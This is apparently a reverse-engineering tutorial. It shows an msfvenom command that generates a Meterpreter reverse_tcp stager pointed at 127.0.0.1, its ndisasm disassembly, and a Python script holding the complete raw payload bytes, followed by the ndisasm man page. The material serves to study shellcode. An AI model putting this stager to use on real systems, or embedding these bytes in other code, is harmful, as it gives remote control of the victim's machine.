root:~ /# msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 -a x86 -f raw --platform win | ndisasm -u -
Found 0 compatible encoders
00000000 FC cld
00000001 E886000000 call dword 0x8c
00000006 60 pushad
00000007 89E5 mov ebp,esp
00000009 31D2 xor edx,edx
0000000B 648B5230 mov edx,[fs:edx+0x30]
0000000F 8B520C mov edx,[edx+0xc]
00000012 8B5214 mov edx,[edx+0x14]
00000015 8B7228 mov esi,[edx+0x28]
00000018 0FB74A26 movzx ecx,word [edx+0x26]
0000001C 31FF xor edi,edi
0000001E 31C0 xor eax,eax
00000020 AC lodsb
00000021 3C61 cmp al,0x61
00000023 7C02 jl 0x27
00000025 2C20 sub al,0x20
00000027 C1CF0D ror edi,0xd
0000002A 01C7 add edi,eax
0000002C E2F0 loop 0x1e
0000002E 52 push edx
0000002F 57 push edi
00000030 8B5210 mov edx,[edx+0x10]
00000033 8B423C mov eax,[edx+0x3c]
00000036 8B4C1078 mov ecx,[eax+edx+0x78]
0000003A E34A jecxz 0x86
0000003C 01D1 add ecx,edx
0000003E 51 push ecx
0000003F 8B5920 mov ebx,[ecx+0x20]
00000042 01D3 add ebx,edx
00000044 8B4918 mov ecx,[ecx+0x18]
00000047 E33C jecxz 0x85
00000049 49 dec ecx
0000004A 8B348B mov esi,[ebx+ecx*4]
0000004D 01D6 add esi,edx
0000004F 31FF xor edi,edi
00000051 31C0 xor eax,eax
00000053 AC lodsb
00000054 C1CF0D ror edi,0xd
00000057 01C7 add edi,eax
00000059 38E0 cmp al,ah
0000005B 75F4 jnz 0x51
0000005D 037DF8 add edi,[ebp-0x8]
00000060 3B7D24 cmp edi,[ebp+0x24]
00000063 75E2 jnz 0x47
00000065 58 pop eax
00000066 8B5824 mov ebx,[eax+0x24]
00000069 01D3 add ebx,edx
0000006B 668B0C4B mov cx,[ebx+ecx*2]
0000006F 8B581C mov ebx,[eax+0x1c]
00000072 01D3 add ebx,edx
00000074 8B048B mov eax,[ebx+ecx*4]
00000077 01D0 add eax,edx
00000079 89442424 mov [esp+0x24],eax
0000007D 5B pop ebx
0000007E 5B pop ebx
0000007F 61 popad
00000080 59 pop ecx
00000081 5A pop edx
00000082 51 push ecx
00000083 FFE0 jmp eax
00000085 58 pop eax
00000086 5F pop edi
00000087 5A pop edx
00000088 8B12 mov edx,[edx]
0000008A EB89 jmp short 0x15
0000008C 5D pop ebp
0000008D 6833320000 push dword 0x3233
00000092 687773325F push dword 0x5f327377
00000097 54 push esp
00000098 684C772607 push dword 0x726774c
0000009D FFD5 call ebp
0000009F B890010000 mov eax,0x190
000000A4 29C4 sub esp,eax
000000A6 54 push esp
000000A7 50 push eax
000000A8 6829806B00 push dword 0x6b8029
000000AD FFD5 call ebp
000000AF 50 push eax
000000B0 50 push eax
000000B1 50 push eax
000000B2 50 push eax
000000B3 40 inc eax
000000B4 50 push eax
000000B5 40 inc eax
000000B6 50 push eax
000000B7 68EA0FDFE0 push dword 0xe0df0fea
000000BC FFD5 call ebp
000000BE 97 xchg eax,edi
000000BF 6A05 push byte +0x5
000000C1 687F000001 push dword 0x100007f
000000C6 680200115C push dword 0x5c110002
000000CB 89E6 mov esi,esp
000000CD 6A10 push byte +0x10
000000CF 56 push esi
000000D0 57 push edi
000000D1 6899A57461 push dword 0x6174a599
000000D6 FFD5 call ebp
000000D8 85C0 test eax,eax
000000DA 740C jz 0xe8
000000DC FF4E08 dec dword [esi+0x8]
000000DF 75EC jnz 0xcd
000000E1 68F0B5A256 push dword 0x56a2b5f0
000000E6 FFD5 call ebp
000000E8 6A00 push byte +0x0
000000EA 6A04 push byte +0x4
000000EC 56 push esi
000000ED 57 push edi
000000EE 6802D9C85F push dword 0x5fc8d902
000000F3 FFD5 call ebp
000000F5 8B36 mov esi,[esi]
000000F7 6A40 push byte +0x40
000000F9 6800100000 push dword 0x1000
000000FE 56 push esi
000000FF 6A00 push byte +0x0
00000101 6858A453E5 push dword 0xe553a458
00000106 FFD5 call ebp
00000108 93 xchg eax,ebx
00000109 53 push ebx
0000010A 6A00 push byte +0x0
0000010C 56 push esi
0000010D 53 push ebx
0000010E 57 push edi
0000010F 6802D9C85F push dword 0x5fc8d902
00000114 FFD5 call ebp
00000116 01C3 add ebx,eax
00000118 29C6 sub esi,eax
0000011A 85F6 test esi,esi
0000011C 75EC jnz 0x10a
0000011E C3 ret
If the shellcode is embedded in a Python script, it can be disassembled the same way by piping the script's output into ndisasm.
root:~ /# cat shellcode.py
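#!/usr/bin/env python
# -*- coding: utf8 -*-
"""Emit the stager bytes analysed above as a raw byte stream on stdout.

The byte string below is the same payload shown in the ndisasm listing at
the top of the page (287 bytes, ending in the ``ret`` at offset 0x11e), so
``python shellcode.py | ndisasm -u -`` reproduces that listing. Inspecting
the listing rather than running the bytes is the point of the exercise: the
``push dword 0x100007f`` / ``push dword 0x5c110002`` pair, for instance, is
the sockaddr_in the stager connects to (127.0.0.1, matching LHOST).

Two things ``print buf`` got wrong for this use:
  * ``print`` appends a newline, so one stray 0x0a byte followed the final
    ``ret`` in the piped stream.
  * Under Python 3 a plain string literal is Unicode text and ``print``
    re-encodes it, so every escape above 0x7f would be mangled on the way
    to the disassembler. ``b""`` literals plus a write to the underlying
    binary stream behave identically on Python 2.6+ and Python 3.
"""
import sys

buf = b""
buf += b"\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"
buf += b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
buf += b"\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"
buf += b"\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59"
buf += b"\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01"
buf += b"\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0"
buf += b"\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58"
buf += b"\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
buf += b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
buf += b"\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33"
buf += b"\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
buf += b"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
buf += b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40"
buf += b"\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f"
buf += b"\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
buf += b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff"
buf += b"\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00"
buf += b"\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"
buf += b"\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4"
buf += b"\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02"
buf += b"\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec"
buf += b"\xc3"

# Python 3 exposes the binary stream as sys.stdout.buffer; Python 2's
# sys.stdout already accepts byte strings, so fall back to it there.
# write() adds nothing after the bytes, unlike the print statement.
getattr(sys.stdout, "buffer", sys.stdout).write(buf)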
root:~ /# python2 shellcode.py | ndisasm -u -
00000000 FC cld
00000001 E886000000 call dword 0x8c
00000006 60 pushad
00000007 89E5 mov ebp,esp
00000009 31D2 xor edx,edx
0000000B 648B5230 mov edx,[fs:edx+0x30]
0000000F 8B520C mov edx,[edx+0xc]
00000012 8B5214 mov edx,[edx+0x14]
00000015 8B7228 mov esi,[edx+0x28]
00000018 0FB74A26 movzx ecx,word [edx+0x26]
0000001C 31FF xor edi,edi
0000001E 31C0 xor eax,eax
00000020 AC lodsb
00000021 3C61 cmp al,0x61
00000023 7C02 jl 0x27
00000025 2C20 sub al,0x20
00000027 C1CF0D ror edi,0xd
0000002A 01C7 add edi,eax
0000002C E2F0 loop 0x1e
0000002E 52 push edx
0000002F 57 push edi
00000030 8B5210 mov edx,[edx+0x10]
00000033 8B423C mov eax,[edx+0x3c]
00000036 8B4C1078 mov ecx,[eax+edx+0x78]
0000003A E34A jecxz 0x86
0000003C 01D1 add ecx,edx
0000003E 51 push ecx
0000003F 8B5920 mov ebx,[ecx+0x20]
00000042 01D3 add ebx,edx
00000044 8B4918 mov ecx,[ecx+0x18]
00000047 E33C jecxz 0x85
00000049 49 dec ecx
0000004A 8B348B mov esi,[ebx+ecx*4]
0000004D 01D6 add esi,edx
0000004F 31FF xor edi,edi
00000051 31C0 xor eax,eax
00000053 AC lodsb
00000054 C1CF0D ror edi,0xd
00000057 01C7 add edi,eax
00000059 38E0 cmp al,ah
0000005B 75F4 jnz 0x51
0000005D 037DF8 add edi,[ebp-0x8]
00000060 3B7D24 cmp edi,[ebp+0x24]
00000063 75E2 jnz 0x47
00000065 58 pop eax
00000066 8B5824 mov ebx,[eax+0x24]
00000069 01D3 add ebx,edx
0000006B 668B0C4B mov cx,[ebx+ecx*2]
0000006F 8B581C mov ebx,[eax+0x1c]
00000072 01D3 add ebx,edx
00000074 8B048B mov eax,[ebx+ecx*4]
00000077 01D0 add eax,edx
00000079 89442424 mov [esp+0x24],eax
0000007D 5B pop ebx
0000007E 5B pop ebx
0000007F 61 popad
00000080 59 pop ecx
00000081 5A pop edx
00000082 51 push ecx
00000083 FFE0 jmp eax
00000085 58 pop eax
00000086 5F pop edi
00000087 5A pop edx
00000088 8B12 mov edx,[edx]
0000008A EB89 jmp short 0x15
0000008C 5D pop ebp
0000008D 6833320000 push dword 0x3233
00000092 687773325F push dword 0x5f327377
00000097 54 push esp
00000098 684C772607 push dword 0x726774c
0000009D FFD5 call ebp
0000009F B890010000 mov eax,0x190
000000A4 29C4 sub esp,eax
000000A6 54 push esp
000000A7 50 push eax
000000A8 6829806B00 push dword 0x6b8029
000000AD FFD5 call ebp
000000AF 50 push eax
000000B0 50 push eax
000000B1 50 push eax
000000B2 50 push eax
000000B3 40 inc eax
000000B4 50 push eax
000000B5 40 inc eax
000000B6 50 push eax
000000B7 68EA0FDFE0 push dword 0xe0df0fea
000000BC FFD5 call ebp
000000BE 97 xchg eax,edi
000000BF 6A05 push byte +0x5
000000C1 687F000001 push dword 0x100007f
000000C6 680200115C push dword 0x5c110002
000000CB 89E6 mov esi,esp
000000CD 6A10 push byte +0x10
000000CF 56 push esi
000000D0 57 push edi
000000D1 6899A57461 push dword 0x6174a599
000000D6 FFD5 call ebp
000000D8 85C0 test eax,eax
000000DA 740C jz 0xe8
000000DC FF4E08 dec dword [esi+0x8]
000000DF 75EC jnz 0xcd
000000E1 68F0B5A256 push dword 0x56a2b5f0
000000E6 FFD5 call ebp
000000E8 6A00 push byte +0x0
000000EA 6A04 push byte +0x4
000000EC 56 push esi
000000ED 57 push edi
000000EE 6802D9C85F push dword 0x5fc8d902
000000F3 FFD5 call ebp
000000F5 8B36 mov esi,[esi]
000000F7 6A40 push byte +0x40
000000F9 6800100000 push dword 0x1000
000000FE 56 push esi
000000FF 6A00 push byte +0x0
00000101 6858A453E5 push dword 0xe553a458
00000106 FFD5 call ebp
00000108 93 xchg eax,ebx
00000109 53 push ebx
0000010A 6A00 push byte +0x0
0000010C 56 push esi
0000010D 53 push ebx
0000010E 57 push edi
0000010F 6802D9C85F push dword 0x5fc8d902
00000114 FFD5 call ebp
00000116 01C3 add ebx,eax
00000118 29C6 sub esi,eax
0000011A 85F6 test esi,esi
0000011C 75EC jnz 0x10a
0000011E C3 ret
NDISASM(1) NDISASM(1)
NAME
ndisasm - the Netwide Disassembler, an 80x86 binary file disassembler
SYNOPSIS
ndisasm [ -o origin ] [ -s sync-point [...]] [ -a | -i ] [ -b bits ] [ -u ] [ -e hdrlen ] [ -k offset,length [...]] infile
ndisasm -h
ndisasm -r
DESCRIPTION
The ndisasm command generates a disassembly listing of the binary file infile and directs it to stdout.
OPTIONS
-h Causes ndisasm to exit immediately, after giving a summary of its invocation options.
-r Causes ndisasm to exit immediately, after displaying its version number.
-o origin
Specifies the notional load address for the file. This option causes ndisasm to compute correctly both the addresses it lists down the left-hand margin and the target
addresses of PC-relative jumps and calls.
-s sync-point
Manually specifies a synchronisation address, such that ndisasm will not output any machine instruction which encompasses bytes on both sides of the
address. Hence the instruction which starts at that address will be correctly disassembled.
-e hdrlen
Specifies a number of bytes to discard from the beginning of the file before starting disassembly. This does not count towards the calculation of the
disassembly offset: the first disassembled instruction will be shown starting at the given load address.
-k offset,length
Specifies that length bytes, starting from disassembly offset offset, should be skipped over without generating any output. The skipped bytes still
count towards the calculation of the disassembly offset.
-a or -i
Enables automatic (or intelligent) sync mode, in which ndisasm will attempt to guess where synchronisation should be performed, by means of examining
the target addresses of the relative jumps and calls it disassembles.
-b bits
Specifies 16-, 32- or 64-bit mode. The default is 16-bit mode.
-u Specifies 32-bit mode, more compactly than using `-b 32`.
-p vendor
Prefers instructions as defined by vendor in case of a conflict. Known vendor names include intel, amd, cyrix, and idt. The default is intel.
RESTRICTIONS
ndisasm only disassembles binary files: it has no understanding of the header information present in object or executable files. If you want to disassemble
an object file, you should probably be using objdump(1).
Auto-sync mode won't necessarily cure all your synchronisation problems: a sync marker can only be placed automatically if a jump or call instruction is
found to refer to it before ndisasm actually disassembles that part of the code. Also, if spurious jumps or calls result from disassembling non-machine-code
data, sync markers may get placed in strange places. Feel free to turn auto-sync off and go back to doing it manually if necessary.
SEE ALSO
objdump(1).
The Netwide Assembler Project NDISASM(1)